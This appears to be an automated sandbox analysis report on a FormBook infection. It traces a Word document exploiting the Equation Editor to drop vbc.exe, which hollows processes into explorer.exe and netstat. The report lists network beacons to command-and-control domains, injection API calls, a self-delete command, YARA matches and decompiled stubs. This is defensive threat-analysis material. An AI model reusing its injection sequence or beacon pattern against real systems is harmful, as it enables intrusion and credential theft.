65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49173	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:20:07.373276949 CEST	443	OUT	GET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1 Host: www.nevomo.group Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 13:20:07.402926922 CEST	443	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 08 Apr 2021 11:20:07 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: http://nevomo.tech/nnmd?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== X-IPLB-Instance: 16982 Set-Cookie: SERVERID77446=2001710\|YG7m6\|YG7m6; path=/ Cache-control: private Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2244 Parent PID: 584

General

Start time:	13:17:35
Start date:	08/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f720000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2564 Parent PID: 584

General

Start time:	13:17:45
Start date:	08/04/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2452 Parent PID: 2564

General

Start time:	13:17:47
Start date:	08/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	387072 bytes
MD5 hash:	29E8627D7B80C21FC98C82314F3DF5E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2828 Parent PID: 2452

General

Start time:	13:17:48
Start date:	08/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	387072 bytes
MD5 hash:	29E8627D7B80C21FC98C82314F3DF5E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2828

General

Start time:	13:17:52
Start date:	08/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 852 Parent PID: 1388

General

Start time:	13:18:04
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0xc90000
File size:	27136 bytes
MD5 hash:	32297BB17E6EC700D0FC869F9ACAF561
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2192 Parent PID: 852

General

Start time:	13:18:20
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a180000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2452 Parent PID: 2564 vbc.exeCOMMON

Executed Functions

Function 00220110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00220156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0022016C
CreateProcessA.KERNEL32(?,00000000), ref: 00220255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00220270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00220283
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002202C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 002202E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00220304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0022032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00220399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002203BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 002203E1
ResumeThread.KERNELBASE(00000000), ref: 002203ED
CloseHandle.KERNELBASE(00000000), ref: 002203F9
ExitProcess.KERNELBASE(00000000), ref: 00220412

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocWrite$Thread$CloseContextCreateExitFileFreeHandleModuleNameReadResumeSectionUnmapViewWow64
String ID:
API String ID: 3514283409-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 24a121265c30a97c9c079e1bb0a97a9fa099663222518ea946392e89d0634932
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 41B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00220420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00220533

Strings

d, xrefs: 00220584
mfoaskdfnoa, xrefs: 00220520, 00220523
0, xrefs: 00220492
saodkfnosa9uin, xrefs: 002204DA

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: f2926542c452d504892dafbc97186a12241248fd75bb8c14f036e98f9cf9e057
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 4C511B70D08388EAEB11CBD8D849BDDBFB26F11708F144058E5447F286C7BA5568CB65

Uniqueness

Uniqueness Score: -1.00%

Function 002205B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 002205EC

Strings

apfHQ, xrefs: 002205E2, 002205E5
o, xrefs: 00220600

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: cb952e8269240011596fa5b92d81d9eb0bdb741b22ecd29bbc71170d01f5757e
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 8B010C70C0425DEADF10DFD8D5583AEBFB5AB41308F148099D4092B252D7B69B68CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03F2954E, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 03F29596

Memory Dump Source

Source File: 00000009.00000002.2107398714.0000000003F28000.00000040.00000001.sdmp, Offset: 03F28000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 59d0de2fca79b05bfa0d378722ef5a818fe82c4ed97af4989bc7ca66e1fc2aa0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 20F0F631A00321AFD7207BF89C8DBAFBAECBF48224F140128F653D20C0CBB0E8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 03F2920D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03F2925E

Memory Dump Source

Source File: 00000009.00000002.2107398714.0000000003F28000.00000040.00000001.sdmp, Offset: 03F28000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 202225508ea09e904738ecfa888ac6ea1033806079f9812cc418bd9f9b620d83
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C4110B79A00208EFDB01DF98C985E99BFF5AF08751F198094F9489B361D771EA50DB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0022A1FB, Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

(, xrefs: 0022A51C

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 52a3563e9b82b145eb9740cff71069a9f321bfcff10e8ccd27d3ee347d847adc
Instruction ID: e44b748ffe235ed6969018f93c81f81160ff6bb9cc7d4df207797288c0787d1f
Opcode Fuzzy Hash: 52a3563e9b82b145eb9740cff71069a9f321bfcff10e8ccd27d3ee347d847adc
Instruction Fuzzy Hash: 66021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0022A200, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0022A51C

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: f07216134815f09ec55e8dc7f57dd9d92f214ce6032a6915bea540d49c841b13
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: A7021EB6E006189FDB14CF99D8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0023CAA2, Relevance: 1.6, Strings: 1, Instructions: 373COMMON

Download Yara Rule

Strings

{2K, xrefs: 0023CCB7

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: {2K
API String ID: 0-870351520
Opcode ID: 536a93b5fe36b187dd2ce96dc80d1ec816f8eacc7ecfad78b0448455308f5814
Instruction ID: e82e05e666db135b720a60f5b4b59c18d53f2cccf37baf0f079bb58aed3119bd
Opcode Fuzzy Hash: 536a93b5fe36b187dd2ce96dc80d1ec816f8eacc7ecfad78b0448455308f5814
Instruction Fuzzy Hash: 30027772A28795CFD716CF38D99AB113FB5F746310B18424EC8A2A35D2D774212ACF89

Uniqueness

Uniqueness Score: -1.00%

Function 0023E05A, Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

?G)b, xrefs: 0023E10B

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ?G)b
API String ID: 0-455291697
Opcode ID: 117ca8e805a5da32afa949792610fed5621ccc83cb0d7df2917f9c5970590ecb
Instruction ID: acfa46aff37721378143451385b05d18592197da72a045514a8f9ea97dab823d
Opcode Fuzzy Hash: 117ca8e805a5da32afa949792610fed5621ccc83cb0d7df2917f9c5970590ecb
Instruction Fuzzy Hash: A5516672828B56CFDB19CF34DC867513BB0F752720B18439EC862A71E1D7791269CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00224550, Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 14b69c3b18e3e664f683e67f8520ad9910b2c1c56f21663063b7fa9b7a1689f9
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 02026F73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 00224327, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4ddc81a94f55db7597d1e5d6bbd77ad6b24f1b20dcf67b8cf65cd9cf014b49
Instruction ID: 1ca6c9028d28c84820882fff032d6e6eae14b9fc35b17a9b29ad97266b036970
Opcode Fuzzy Hash: 6d4ddc81a94f55db7597d1e5d6bbd77ad6b24f1b20dcf67b8cf65cd9cf014b49
Instruction Fuzzy Hash: B85185B3E14A214BD318CF05CC40635B692EFD8312B5F81BEDD1A9B357CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00224330, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 720f737326204917769bad0541075cbfd44445371e1622b67b6a49c4c3770f21
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: D15170B3E14A214BD3188F09DC40631B792FFD8312B5F81BADD199B357CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0023D2CF, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e386fc24eff8e2f4351ccd72da9c12e8b1d196191a3e103c7260600953e6970
Instruction ID: 6c4dfb54d2be31993259e2f1c480e445c7a0fe740773f395a6e5f88398727476
Opcode Fuzzy Hash: 9e386fc24eff8e2f4351ccd72da9c12e8b1d196191a3e103c7260600953e6970
Instruction Fuzzy Hash: E0717772A15355CFD712DF38DD863423BB0F722720F24424ED8A193692E7716126CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0023DA6F, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e915b007a7f8357d87286f1f53eaa88a8036a2b9d069f95b5d4477ef2bf1dc3
Instruction ID: 3d99abed695b26f00f3ec84a44b412066986241d767a43e3dd5bea8fa972d29c
Opcode Fuzzy Hash: 3e915b007a7f8357d87286f1f53eaa88a8036a2b9d069f95b5d4477ef2bf1dc3
Instruction Fuzzy Hash: E1710D329493C1DFE715EF79E8AA7813F71F792320B48029DC9A15B1D2D3B4216ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 002225D0, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 332f51e855d62fbcc1f3865cae85a76812879b352f10a059fc7da19ff3592fa0
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 303182126586F14DD30E436D08BD675AEC18E5720174EC2FEDADA6F2F3C0888418D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00222714, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
Instruction ID: 8e2a9752b04de727483892bcc7f62ddda10f892f133184a8f47e2a1320eac6b5
Opcode Fuzzy Hash: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
Instruction Fuzzy Hash: CA212D35A08355AFC719CFBCC4815ADFFA1EF89310B68C29DC8995B393C2724816C750

Uniqueness

Uniqueness Score: -1.00%

Function 00220042, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 36fb6f7d87f4710edc92918b0a4e3ee1a20c97347ccdcc309f284cc1cd3e3bb5
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: D0117072350110AFE754DEA5ECD1FA673EAEB88320B298155E908CB312D675ED11C760

Uniqueness

Uniqueness Score: -1.00%

Function 03F28E2B, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2107398714.0000000003F28000.00000040.00000001.sdmp, Offset: 03F28000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: ecf7d5cd7b52bf7b2f01388e3c8d032a765953002884e2458e09b66663b32d98
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E4118E72340611EFD744DF95DC80FA677EAEB88660B198069ED08CF316E679E801C761

Uniqueness

Uniqueness Score: -1.00%

Function 00229B80, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
Instruction ID: 74fc0706d39a7bc634382559c14bd00d220f343a0a708aa946c05706e07cdea6
Opcode Fuzzy Hash: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
Instruction Fuzzy Hash: 45C04C70A451585BDB0889799E127EA76988305211F1402BD780FC2244E55E591055A6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2828 Parent PID: 2452 vbc.exeCOMMON

Executed Functions

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
Instruction ID: 2ba84caaadc622240e861cb26b9ba5da1393a070836c945a2d03e797859a7331
Opcode Fuzzy Hash: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
Instruction Fuzzy Hash: CB21B8B2200108AFDB14DF99DC81EEB77ADEF8C754F158649FA1DA7241CA34E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				L00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
